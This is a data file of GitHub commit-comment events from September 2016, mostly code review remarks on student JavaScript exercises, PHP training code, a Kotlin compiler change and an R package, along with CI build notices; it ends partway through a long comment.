{"id":"4525866220","type":"CommitCommentEvent","actor":{"login":"Deamonor"},"repo":{"name":"Testfirma1337/DASleet"},"payload":{"comment":{"id":18924029,"position":null,"line":null,"path":null,"commit_id":"b530d008f043ad2b00a948e88d0d54366b516397","created_at":"2016-09-07T07:20:30Z","updated_at":"2016-09-07T07:20:30Z","body":"das war erst eeder anafng ich wede noch mehr schieße adden und damit unbesigebar wredn muhuhuhuh\r\n"}},"created_at":"2016-09-07T07:20:30Z"}
{"id":"4525866503","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18924030,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-07T07:20:34Z","updated_at":"2016-09-07T07:20:34Z","body":"ありがとうございます。\r\nこちらの書籍はおそらくPHP初心者にとっては良書になるかと思います(読んだことはないのですがお聞きした話によると)。\r\n\r\nただ書かれた年から少し古い情報であること、また本当の初心者向けの本のため、(おそらくわかりやすいようにわざと)セキュリティを考慮していないコードがサンプルになっているのかと思います。\r\n\r\n#13 のSQLインジェクションの項目だけ調べて、それを踏まえて元のコードに書き直してみましょう(元のコードのほうがセキュリティ的に堅固なものとなっています)。"}},"created_at":"2016-09-07T07:20:34Z"}
{"id":"4525871747","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"daltonmaag/ubuntu"},"payload":{"comment":{"id":18924041,"position":16,"line":19,"path":"README.txt","commit_id":"013ca10a1b4e91fd32f9770e1d2105f7215a0f5e","created_at":"2016-09-07T07:21:56Z","updated_at":"2016-09-07T07:21:56Z","body":"Perhals you mean `virtualenv` here?"}},"created_at":"2016-09-07T07:21:56Z"}
{"id":"4525873212","type":"CommitCommentEvent","actor":{"login":"chvalean"},"repo":{"name":"LIS/lis-test"},"payload":{"comment":{"id":18924043,"position":null,"line":null,"path":null,"commit_id":"af41a07ec2e7754a16cf8928c2f9766cc5e8724d","created_at":"2016-09-07T07:22:20Z","updated_at":"2016-09-07T07:22:20Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;TUeFpTZc&#x2F;372-handle-dependency-vm-automation\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> handle dependency VM automation</a>"}},"created_at":"2016-09-07T07:22:20Z"}
{"id":"4525873575","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"fredpinon/Fred"},"payload":{"comment":{"id":18924044,"position":6,"line":6,"path":"wk2/js_day2/ex3/ex3.js","commit_id":"d3e57c06802753ebd9ff79ed36b3c0996c40e04c","created_at":"2016-09-07T07:22:25Z","updated_at":"2016-09-07T07:22:25Z","body":"This is missing a sizable range of possible colors. I think what you want to do here is get a random number that is between 0 and 15 and select the character that is at that index in the string '0123456789abcdef'. If you do that six times you would have a random color that is one out of the 16,581,375 (255 x 255 x 255) available. "}},"created_at":"2016-09-07T07:22:25Z"}
{"id":"4525874442","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"tus/tus.io"},"payload":{"comment":{"id":18924045,"position":7,"line":8,"path":"package.json","commit_id":"87dddef513228ae549382e533732e7ba762aba00","created_at":"2016-09-07T07:22:39Z","updated_at":"2016-09-07T07:22:39Z","body":"> Hey there, thanks for taking an interest. I admire lodash! It seems this is in error. \r\n\r\nAh cool! I was searching github for `JEKYLL_ENV` use in npm scripts and came across this snippet :)"}},"created_at":"2016-09-07T07:22:39Z"}
{"id":"4525876294","type":"CommitCommentEvent","actor":{"login":"kvz"},"repo":{"name":"tus/tus.io"},"payload":{"comment":{"id":18924049,"position":7,"line":8,"path":"package.json","commit_id":"87dddef513228ae549382e533732e7ba762aba00","created_at":"2016-09-07T07:23:09Z","updated_at":"2016-09-07T07:23:09Z","body":"👌 "}},"created_at":"2016-09-07T07:23:09Z"}
{"id":"4525877744","type":"CommitCommentEvent","actor":{"login":"DF-pc"},"repo":{"name":"foundation-runtime/communication"},"payload":{"comment":{"id":18924052,"position":6,"line":6,"path":"http-common/pom.xml","commit_id":"ebb2f008cb9a440b446321627a2bb40aa89aa008","created_at":"2016-09-07T07:23:31Z","updated_at":"2016-09-07T07:23:31Z","body":"水电费\r\n"}},"created_at":"2016-09-07T07:23:31Z"}
{"id":"4525877748","type":"CommitCommentEvent","actor":{"login":"therightmandev"},"repo":{"name":"therightmandev/WebShop"},"payload":{"comment":{"id":18924053,"position":10,"line":3,"path":"server/static/sass/pages/_index.scss","commit_id":"983afd492083e1f64a8ae0d0d295e45edcab0a70","created_at":"2016-09-07T07:23:31Z","updated_at":"2016-09-07T07:23:31Z","body":"I think this link needs to be fixed"}},"created_at":"2016-09-07T07:23:31Z"}
{"id":"4525879200","type":"CommitCommentEvent","actor":{"login":"therightmandev"},"repo":{"name":"therightmandev/WebShop"},"payload":{"comment":{"id":18924058,"position":8,"line":5,"path":"server/static/sass/pages/_signpages.scss","commit_id":"983afd492083e1f64a8ae0d0d295e45edcab0a70","created_at":"2016-09-07T07:23:57Z","updated_at":"2016-09-07T07:23:57Z","body":"And this one"}},"created_at":"2016-09-07T07:23:57Z"}
{"id":"4525879309","type":"CommitCommentEvent","actor":{"login":"ErisDS"},"repo":{"name":"TryGhost/Ghost"},"payload":{"comment":{"id":18924059,"position":null,"line":null,"path":null,"commit_id":"54559f24f95239740b8f988d48a08ea276f7b335","created_at":"2016-09-07T07:23:59Z","updated_at":"2016-09-07T07:23:59Z","body":"0.10.1 has been released with these changes"}},"created_at":"2016-09-07T07:23:59Z"}
{"id":"4525879406","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18924060,"position":8,"line":8,"path":"issue11/result.php","commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-07T07:24:02Z","updated_at":"2016-09-07T07:24:02Z","body":"ここも元のコード(try ~ catchを使っている箇所)の方がより良いコードかと思います。\r\n\r\n同じ書籍を参考にされたのかと思われます。なぜ(try ~ catchを使っている箇所)を書籍のほうで使っていないかは、セキュリティを無視したのと理由になります(初心者向けに簡略化したため)。\r\n\r\n\r\nざっくりと 「php try catch」 を調べてみましょう(ざっくりとでOKです)。"}},"created_at":"2016-09-07T07:24:02Z"}
{"id":"4525880389","type":"CommitCommentEvent","actor":{"login":"MoonBrew"},"repo":{"name":"MoonBrew/genesis"},"payload":{"comment":{"id":18924063,"position":null,"line":null,"path":null,"commit_id":"2fbbe74e9c27452823928c614c31b3ac44f9e94e","created_at":"2016-09-07T07:24:16Z","updated_at":"2016-09-07T07:24:16Z","body":"![error](https://cloud.githubusercontent.com/assets/21254995/18303259/d08c81c0-74f9-11e6-9273-1a06b945149c.png)\r\n\r\nApparently double values are off by 0.0000000000000001. So 0.75 is < 0.7500000000000001 and the loop terminates. It is supposed to run one more iteration."}},"created_at":"2016-09-07T07:24:16Z"}
{"id":"4525881188","type":"CommitCommentEvent","actor":{"login":"kvz"},"repo":{"name":"tus/tus.io"},"payload":{"comment":{"id":18924065,"position":7,"line":8,"path":"package.json","commit_id":"87dddef513228ae549382e533732e7ba762aba00","created_at":"2016-09-07T07:24:28Z","updated_at":"2016-09-07T07:24:28Z","body":"Fixed in https://github.com/tus/tus.io/commit/5ac28165adca898ccf6475633beb8037db55e38a"}},"created_at":"2016-09-07T07:24:28Z"}
{"id":"4525886759","type":"CommitCommentEvent","actor":{"login":"bdestombe"},"repo":{"name":"modflowpy/flopy"},"payload":{"comment":{"id":18924069,"position":31,"line":196,"path":"flopy/seawat/swtvsc.py","commit_id":"584b0d047a1c1b343a6bbf3342c6dfee98ad0d03","created_at":"2016-09-07T07:25:50Z","updated_at":"2016-09-07T07:25:50Z","body":"This requires mtmuspec, dmudc and cmuref to be always subscriptable, ie. a list. For nsmueos == 1, it wasn't needed before to pass a list. And the documentation.."}},"created_at":"2016-09-07T07:25:50Z"}
{"id":"4525887695","type":"CommitCommentEvent","actor":{"login":"max-kammerer"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18924070,"position":141,"line":213,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/PropertyReferenceCodegen.kt","commit_id":"efe3675262654191a28c1708a325ef381d48e4b8","created_at":"2016-09-07T07:26:05Z","updated_at":"2016-09-07T07:26:05Z","body":"Used from LambdaInfo"}},"created_at":"2016-09-07T07:26:05Z"}
{"id":"4525887719","type":"CommitCommentEvent","actor":{"login":"zyla"},"repo":{"name":"sdiehl/write-you-a-haskell"},"payload":{"comment":{"id":18924071,"position":71,"line":150,"path":"006_hindley_milner.md","commit_id":"73b43dcf89210e75b508694df675961b4e22e0ff","created_at":"2016-09-07T07:26:06Z","updated_at":"2016-09-07T07:26:06Z","body":"That's true. Maybe I don't understand the meaning of \"nonpathological\" here. I still think this is a misleading example of free theorems, because it requires theorems the compiler can't prove (the first functor law), without mentioning it anywhere in the text. One might argue that the Functor typeclass is \"culturally\" required to satisfy the functor laws, but we are defining `fmap` here, so it's kinda circular reasoning."}},"created_at":"2016-09-07T07:26:06Z"}
{"id":"4525888360","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"Angizd/A.zobarandiez"},"payload":{"comment":{"id":18924073,"position":10,"line":10,"path":"wk2/06:09:16/Ex2/JavaScript.js","commit_id":"d1eca679b6483b73a80d87606babfb3b9ed75f15","created_at":"2016-09-07T07:26:15Z","updated_at":"2016-09-07T07:26:15Z","body":"A problem with maintaining a count of how many times the input event happens is that the input event can happen when the length of the string in the textarea decreases. For example, if the user hits the backspace key an input event will be fired but instead of adding a new character to the textarea we should remove one. To avoid this you could check the length of the string in the textarea every time the input event happens."}},"created_at":"2016-09-07T07:26:15Z"}
{"id":"4525889966","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18924074,"position":18,"line":18,"path":"issue11/update.php","commit_id":"1e6e905e1316184b763fe3b9532074373dd6194a","created_at":"2016-09-07T07:26:39Z","updated_at":"2016-09-07T07:26:39Z","body":"https://github.com/hdfukuoka1985/phptrainning/commit/c660213b9935079bf9ac89d9705a76527e5770b7#commitcomment-18924030\r\n\r\nの修正の後にこちらも直してみましょう(本当のエラー原因は違うのですが直すとエラーも解決されるはず)。\r\n\r\n今なぜエラーになっているかという直接的な原因に関しては\r\nPHPのダブルクォートとシングルクォートの使い方に関して調べてみましょう。"}},"created_at":"2016-09-07T07:26:39Z"}
{"id":"4525890933","type":"CommitCommentEvent","actor":{"login":"thehoneymad"},"repo":{"name":"shanselman/MyNodeAppOnAzure"},"payload":{"comment":{"id":18924077,"position":null,"line":null,"path":null,"commit_id":"2abfaf874fc008475c5208a5c9306964e022f561","created_at":"2016-09-07T07:26:54Z","updated_at":"2016-09-07T07:26:54Z","body":"Sample for any new tutorial or presentation I presume. Felt obliged to comment because the commit message said \"hey\". :D"}},"created_at":"2016-09-07T07:26:54Z"}
{"id":"4525895019","type":"CommitCommentEvent","actor":{"login":"moyogo"},"repo":{"name":"daltonmaag/ubuntu"},"payload":{"comment":{"id":18924085,"position":16,"line":19,"path":"README.txt","commit_id":"013ca10a1b4e91fd32f9770e1d2105f7215a0f5e","created_at":"2016-09-07T07:27:58Z","updated_at":"2016-09-07T07:27:58Z","body":"Obviously, yes."}},"created_at":"2016-09-07T07:27:58Z"}
{"id":"4525895212","type":"CommitCommentEvent","actor":{"login":"max-kammerer"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18924086,"position":149,"line":221,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/PropertyReferenceCodegen.kt","commit_id":"efe3675262654191a28c1708a325ef381d48e4b8","created_at":"2016-09-07T07:28:01Z","updated_at":"2016-09-07T07:28:01Z","body":"Used in InlineCodegen"}},"created_at":"2016-09-07T07:28:01Z"}
{"id":"4525898697","type":"CommitCommentEvent","actor":{"login":"sabose"},"repo":{"name":"sabose/ovirt-site"},"payload":{"comment":{"id":18924093,"position":61,"line":61,"path":"source/develop/release-management/features/gluster/gluster-dr.html.md","commit_id":"70e2e036df0474f955e3c93b6c4ed9cefdf416bc","created_at":"2016-09-07T07:28:52Z","updated_at":"2016-09-07T07:28:52Z","body":"source/images/wiki/storagedomain-dr.png - seems to be correct and displayed below. I will cross check"}},"created_at":"2016-09-07T07:28:52Z"}
{"id":"4525900297","type":"CommitCommentEvent","actor":{"login":"sabose"},"repo":{"name":"sabose/ovirt-site"},"payload":{"comment":{"id":18924096,"position":63,"line":63,"path":"source/develop/release-management/features/gluster/gluster-dr.html.md","commit_id":"70e2e036df0474f955e3c93b6c4ed9cefdf416bc","created_at":"2016-09-07T07:29:15Z","updated_at":"2016-09-07T07:29:15Z","body":"Yes - that could be usefule"}},"created_at":"2016-09-07T07:29:15Z"}
{"id":"4525901465","type":"CommitCommentEvent","actor":{"login":"ericmj"},"repo":{"name":"hexpm/hex"},"payload":{"comment":{"id":18924099,"position":27,"line":76,"path":"lib/mix/tasks/hex/user.ex","commit_id":"52d4e6d3fc9cd383baf8a65bf90c2ae41a69e5c0","created_at":"2016-09-07T07:29:30Z","updated_at":"2016-09-07T07:29:30Z","body":"I don't think the parenthesis serve any purpose here. If we want to require them in function heads we should add a warning for it."}},"created_at":"2016-09-07T07:29:30Z"}
{"id":"4525902075","type":"CommitCommentEvent","actor":{"login":"MoonBrew"},"repo":{"name":"MoonBrew/genesis"},"payload":{"comment":{"id":18924101,"position":null,"line":null,"path":null,"commit_id":"2fbbe74e9c27452823928c614c31b3ac44f9e94e","created_at":"2016-09-07T07:29:39Z","updated_at":"2016-09-07T07:29:39Z","body":"How did the edge tests work? "}},"created_at":"2016-09-07T07:29:39Z"}
{"id":"4525902601","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"Angizd/A.zobarandiez"},"payload":{"comment":{"id":18924102,"position":7,"line":7,"path":"wk2/06:09:16/Ex3/JavaScript.js","commit_id":"d1eca679b6483b73a80d87606babfb3b9ed75f15","created_at":"2016-09-07T07:29:47Z","updated_at":"2016-09-07T07:29:47Z","body":"A lot of colors are being left on the table here since we are only getting characters that are digits. I think what we want to do is get a random number between 0 and 15 and select the character at that index in the string '0123456789abcdef'. If we do that we would get a random color that could be any one of the 16,777,216 (256 x 256 x 256) that are possible."}},"created_at":"2016-09-07T07:29:47Z"}
{"id":"4525904899","type":"CommitCommentEvent","actor":{"login":"blindprayer"},"repo":{"name":"blindprayer/design-pattern"},"payload":{"comment":{"id":18924107,"position":null,"line":null,"path":null,"commit_id":"6dcb6a163cee25ce2540620847067f6c44665357","created_at":"2016-09-07T07:30:19Z","updated_at":"2016-09-07T07:30:19Z","body":"확장성이 좋지 않네요..\r\n새로운 부품을 위한 클래스를 Computer 클래스에 추가할 때마다 Computer 클래스의 코드를 수정해야 하기 때문이죠."}},"created_at":"2016-09-07T07:30:19Z"}
{"id":"4525907675","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"Angizd/A.zobarandiez"},"payload":{"comment":{"id":18924108,"position":26,"line":26,"path":"wk2/06:09:16/Ex4/JavaScript.js","commit_id":"d1eca679b6483b73a80d87606babfb3b9ed75f15","created_at":"2016-09-07T07:30:55Z","updated_at":"2016-09-07T07:30:55Z","body":"This should be indented over once"}},"created_at":"2016-09-07T07:30:55Z"}
{"id":"4525912055","type":"CommitCommentEvent","actor":{"login":"JacobDrummond"},"repo":{"name":"JacobDrummond/Magento2-Product-Downloads"},"payload":{"comment":{"id":18924113,"position":34,"line":34,"path":"Ui/DataProvider/Product/Form/Modifier/Downloads.php","commit_id":"93bf79267e7094b44002e042ec2fb372ea9fa822","created_at":"2016-09-07T07:31:56Z","updated_at":"2016-09-07T07:31:56Z","body":"@11mb, it's not a bug, but simply the fact that Magento changed how [forms were handled](/Sebwite/Magento2-Product-Downloads/issues/3). It was uneconomical to develop this fork, so we went with a paid-for module."}},"created_at":"2016-09-07T07:31:56Z"}
{"id":"4525914598","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"jaels/school"},"payload":{"comment":{"id":18924121,"position":null,"line":null,"path":null,"commit_id":"f94c8a8c60156046ead334b5f578bdd46524a460","created_at":"2016-09-07T07:32:33Z","updated_at":"2016-09-07T07:32:33Z","body":"All for exercises look good to me"}},"created_at":"2016-09-07T07:32:33Z"}
{"id":"4525915540","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18924123,"position":null,"line":null,"path":null,"commit_id":"eeed60d4d57e9ca4cdc4ac8f2c8097e501723f0c","created_at":"2016-09-07T07:32:48Z","updated_at":"2016-09-07T07:32:48Z","body":"TeamCity Ms Demo :: Build [Build 23](http://10.22.17.95:8111/viewLog.html?buildId=46&buildTypeId=MsDemo_Build) is now running\n"}},"created_at":"2016-09-07T07:32:48Z"}
{"id":"4525917350","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"sggua/goit"},"payload":{"comment":{"id":18924130,"position":11,"line":12,"path":"JavaCoreGoIt/src/module04/task46/BankSystemImpl.java","commit_id":"52dd5f924760d8d7aabf52df6ac33c038786a2e4","created_at":"2016-09-07T07:33:16Z","updated_at":"2016-09-07T07:33:16Z","body":"как насчет проверки а хватает ли нам нашего баланса?"}},"created_at":"2016-09-07T07:33:16Z"}
{"id":"4525919841","type":"CommitCommentEvent","actor":{"login":"veronikaslc"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18924135,"position":94,"line":118,"path":"components/family-studies/api/src/main/java/org/phenotips/studies/family/listener/FamilyDeletingListener.java","commit_id":"bf592492e7e58e0ac9cc9f45e7a886d96a46be68","created_at":"2016-09-07T07:33:56Z","updated_at":"2016-09-07T07:33:56Z","body":"Save is called in removeMember(), so here it was not needed and worked without."}},"created_at":"2016-09-07T07:33:56Z"}
{"id":"4525919898","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18924136,"position":null,"line":null,"path":null,"commit_id":"eeed60d4d57e9ca4cdc4ac8f2c8097e501723f0c","created_at":"2016-09-07T07:33:57Z","updated_at":"2016-09-07T07:33:57Z","body":"TeamCity Ms Demo :: Build [Build 23](http://10.22.17.95:8111/viewLog.html?buildId=46&buildTypeId=MsDemo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 6 Build time: 00:01:10"}},"created_at":"2016-09-07T07:33:57Z"}
{"id":"4525920213","type":"CommitCommentEvent","actor":{"login":"akva2"},"repo":{"name":"kmokstad/IFEM-2"},"payload":{"comment":{"id":18924139,"position":46,"line":2632,"path":"src/SIM/SIMbase.C","commit_id":"9cb94669082f5bcc75bbbf67185fc4d97afc967b","created_at":"2016-09-07T07:34:02Z","updated_at":"2016-09-07T07:34:02Z","body":"const std::vector ?"}},"created_at":"2016-09-07T07:34:02Z"}
{"id":"4525920821","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":18924140,"position":21,"line":21,"path":"wk2/DOM-Events/DOM-Event-1/DOM-Event-1.js","commit_id":"cc1500ec6fe9e00782cb60c9170f8ab69813bfbd","created_at":"2016-09-07T07:34:11Z","updated_at":"2016-09-07T07:34:11Z","body":"Shouldn't this be happening every time the mouse moves?"}},"created_at":"2016-09-07T07:34:11Z"}
{"id":"4525922344","type":"CommitCommentEvent","actor":{"login":"solkimicreb"},"repo":{"name":"vivekimsit/nx-framework"},"payload":{"comment":{"id":18924142,"position":null,"line":null,"path":null,"commit_id":"c0812965a1c817710e0388cefe4706f9ed186171","created_at":"2016-09-07T07:34:34Z","updated_at":"2016-09-07T07:34:34Z","body":"Ouch, I didn't know about the HTML5 change about boolean attributes. Previously it could have any value, the only thing that mattered is if it is present or not.\r\n\r\nI think boolean attributes are messed up in both HTML5 and pre-HTML5. What I propose to fix them in general is replacing the default handler in `processAttributesWithoutHandler()`\r\n\r\n```javascript\r\n elem.setAttribute(name, expression(state))\r\n```\r\n\r\nwith something like\r\n\r\n```javascript\r\nconst newValue = expression(state)\r\nif (newValue) {\r\n  try {\r\n    elem.setAttribute(name, newValue)\r\n  } catch (e) {\r\n    elem.setAttribute(name, name)\r\n  }\r\n} else {\r\n  elem.removeAttribute(name)\r\n}\r\n```\r\n\r\nThis would make all boolean attributes prefixed with `@` or `$` work. I don't like the try/catch, but I couldn't find a better way to check if an attribute is a strict HTML5 boolean attribute or not. Do you know of any elegant way to check if an attribute  is boolean or not?\r\n\r\nI agree that we should use `disabled` in constraint validation. I think that form controls have a disabled property, which reflects the `disabled` attribute (true if present, false if not). https://developer.mozilla.org/en-US/docs/Web/API/HTMLSelectElement/disabled\r\n\r\nNice research btw"}},"created_at":"2016-09-07T07:34:34Z"}
{"id":"4525927929","type":"CommitCommentEvent","actor":{"login":"max-kammerer"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18924154,"position":150,"line":222,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/PropertyReferenceCodegen.kt","commit_id":"efe3675262654191a28c1708a325ef381d48e4b8","created_at":"2016-09-07T07:35:58Z","updated_at":"2016-09-07T07:35:58Z","body":"@udalov, it not applicable cause originalFunctionDesc is function inherited from KProperty, we can compare function name with \"get\", \"set\", but it's more hackly"}},"created_at":"2016-09-07T07:35:58Z"}
{"id":"4525928118","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"sggua/goit"},"payload":{"comment":{"id":18924156,"position":12,"line":13,"path":"JavaCoreGoIt/src/module04/task46/BankSystemImpl.java","commit_id":"52dd5f924760d8d7aabf52df6ac33c038786a2e4","created_at":"2016-09-07T07:36:01Z","updated_at":"2016-09-07T07:36:01Z","body":"как насчет того что у нас проценты в интах и целые 1, 2, 3 и т.д. не 0.01, 0.02, 0.03, "}},"created_at":"2016-09-07T07:36:01Z"}
{"id":"4525931922","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":18924163,"position":7,"line":7,"path":"wk2/DOM-Events/DOM-Event-3/DOM-Event-3.js","commit_id":"cc1500ec6fe9e00782cb60c9170f8ab69813bfbd","created_at":"2016-09-07T07:37:01Z","updated_at":"2016-09-07T07:37:01Z","body":"Wow, this is a real interesting way to do this."}},"created_at":"2016-09-07T07:37:01Z"}
{"id":"4525935572","type":"CommitCommentEvent","actor":{"login":"szhua"},"repo":{"name":"szhua/AllTestDemos"},"payload":{"comment":{"id":18924174,"position":null,"line":null,"path":null,"commit_id":"36702b081a82d7618207d6ce41e66bb873eb9875","created_at":"2016-09-07T07:37:53Z","updated_at":"2016-09-07T07:37:53Z","body":"这是一个重要的测试"}},"created_at":"2016-09-07T07:37:53Z"}
{"id":"4525935852","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":18924175,"position":11,"line":11,"path":"wk2/DOM-Events/DOM-Event-4/DOM-Event-4.js","commit_id":"cc1500ec6fe9e00782cb60c9170f8ab69813bfbd","created_at":"2016-09-07T07:37:57Z","updated_at":"2016-09-07T07:37:57Z","body":"Right! Who cares if we stop propagation when the event happens on the outer one? There is no need to write two different event listeners."}},"created_at":"2016-09-07T07:37:57Z"}
{"id":"4525936726","type":"CommitCommentEvent","actor":{"login":"max-kammerer"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18924179,"position":188,"line":260,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/PropertyReferenceCodegen.kt","commit_id":"efe3675262654191a28c1708a325ef381d48e4b8","created_at":"2016-09-07T07:38:11Z","updated_at":"2016-09-07T07:38:11Z","body":"Oh, i don't think about such way"}},"created_at":"2016-09-07T07:38:11Z"}
{"id":"4525937147","type":"CommitCommentEvent","actor":{"login":"szhua"},"repo":{"name":"szhua/AllTestDemos"},"payload":{"comment":{"id":18924182,"position":null,"line":null,"path":null,"commit_id":"36702b081a82d7618207d6ce41e66bb873eb9875","created_at":"2016-09-07T07:38:17Z","updated_at":"2016-09-07T07:38:17Z","body":"水水水水"}},"created_at":"2016-09-07T07:38:17Z"}
{"id":"4525938012","type":"CommitCommentEvent","actor":{"login":"MoOx"},"repo":{"name":"webpack/webpack-dev-server"},"payload":{"comment":{"id":18924183,"position":null,"line":null,"path":null,"commit_id":"be9efdaa2e4539cd90eab27494a965c500c03320","created_at":"2016-09-07T07:38:30Z","updated_at":"2016-09-07T07:38:30Z","body":"This commit definitely bring some regressions. contentBase from webpack.config / devServer section is now completely ignored."}},"created_at":"2016-09-07T07:38:30Z"}
{"id":"4525940435","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18924188,"position":null,"line":null,"path":null,"commit_id":"bd0ae64f54f50cc875711d3e2ceb6cc2790f3849","created_at":"2016-09-07T07:39:07Z","updated_at":"2016-09-07T07:39:07Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 937](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12779&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T07:39:07Z"}
{"id":"4525940766","type":"CommitCommentEvent","actor":{"login":"runcom"},"repo":{"name":"opencontainers/image-spec"},"payload":{"comment":{"id":18924189,"position":73,"line":75,"path":"image/config.go","commit_id":"f2dc0e2d92eb0b39adff14601d84606d894bed16","created_at":"2016-09-07T07:39:12Z","updated_at":"2016-09-07T07:39:12Z","body":"This whole `runtimeSpec` is ugly and should/could be replaced by using the library in `ocitools` probably - it's so easy to get outdated and it's easy to forget something (I already made a PR which was fixing how this was generated)"}},"created_at":"2016-09-07T07:39:12Z"}
{"id":"4525943893","type":"CommitCommentEvent","actor":{"login":"PeterEmil"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18924198,"position":null,"line":null,"path":null,"commit_id":"2d65afb60d43a71475d598a2ac5cbc3bf205dc90","created_at":"2016-09-07T07:39:58Z","updated_at":"2016-09-07T07:39:58Z","body":"It had something to do with my tfr-base template, I think there is some cascading so I thought it had to override the awesome-checkbox defaults. The inline elements weren't lined up as well, so that's why I inserted lines 82-86. But following #19 I think it's best to revert styling for awesome-checkbox.css so it is pristine. Then we'll have to check how we can fix anomalies in the DOM structure in combination with awesome-checkboxes & Bootstraps `checkbox` and `radio` styles."}},"created_at":"2016-09-07T07:39:58Z"}
{"id":"4525944985","type":"CommitCommentEvent","actor":{"login":"fps01"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":18924200,"position":30,"line":33,"path":"src/components/calculator/ProductCalculator.php","commit_id":"9f4dfc2de091fdab4019d1e6294d6e3410c1c06d","created_at":"2016-09-07T07:40:16Z","updated_at":"2016-09-07T07:40:16Z","body":"return Warehouse::getWarehouse($goodsId, $warehouseId);"}},"created_at":"2016-09-07T07:40:16Z"}
{"id":"4525946555","type":"CommitCommentEvent","actor":{"login":"KarenNemeth"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":18924202,"position":21,"line":21,"path":"wk2/DOM-Events/DOM-Event-1/DOM-Event-1.js","commit_id":"cc1500ec6fe9e00782cb60c9170f8ab69813bfbd","created_at":"2016-09-07T07:40:36Z","updated_at":"2016-09-07T07:40:36Z","body":"It does for me. When I remove the squareMove() it actually doesn't work at all. Is there a reason for that? "}},"created_at":"2016-09-07T07:40:36Z"}
{"id":"4525947770","type":"CommitCommentEvent","actor":{"login":"fps01"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":18924204,"position":28,"line":31,"path":"src/components/calculator/ProductCalculator.php","commit_id":"9f4dfc2de091fdab4019d1e6294d6e3410c1c06d","created_at":"2016-09-07T07:40:54Z","updated_at":"2016-09-07T07:40:54Z","body":"remove it"}},"created_at":"2016-09-07T07:40:54Z"}
{"id":"4525949694","type":"CommitCommentEvent","actor":{"login":"jarioksa"},"repo":{"name":"vegandevs/vegan"},"payload":{"comment":{"id":18924205,"position":null,"line":null,"path":null,"commit_id":"b72d3dd0e878e286eabb4b047a844195abf08067","created_at":"2016-09-07T07:41:23Z","updated_at":"2016-09-07T07:41:23Z","body":"@gavinsimpson there are more **analogue** relevant changes in my **vegan** fork `faster-vegdist`. I kept it in my **vegan** fork instead of using `vegandevs` because I did not know what would come out of this when I started. Now it looks like a success and will be probably merged to `vegandevs/vegan`. However, my `jarioksa/vegan` fork is also visible in **github** so that you can see the changes there.\r\n\r\nThere are three main groups of changes:\r\n\r\n1. Defining a **C** function `static` makes it local to the file where it was defined. ` static` functions are not visible outside the file and they are not user-callable from **R** with `.C()`. I think the keyword hints them be  statically linked instead of being dynamically searched when running the function. This sounds like this could be an advantage when a function is called _N*(N-1)/2_ times, but I think modern systems are so clever that if there is any effect it is so small that you cannot measure the speed-up. The look-up may be faster, but in dissimilarities the time you spend in calculation within the function dominates the running time. The main thing is that it marks internal functions as separate from external (user-visible, global) and gives a bit smaller symbol table in the package dynamic library (`.so`,`.dll`). \r\n\r\n2. In my `faster-vegdist` fork I now use `.Call()` interface instead of `.C()`. Ripley (I guess it's he) has a long section in _Writing R Extensions_ manual about speed advantages of `.Call()` over `.C()`, but the effects are marginal in distance functions where huge amount of time is spent within function and time used to enter the function does not matter. The major advantage is that there is less copying and the memory footprint *during* calculation seems to be clearly smaller than with `.C()` also in checks with large data sets (one that I tried at home had 12900 observations giving over 83 million dissimilarities). However, `.Call()` *adds* complexity to 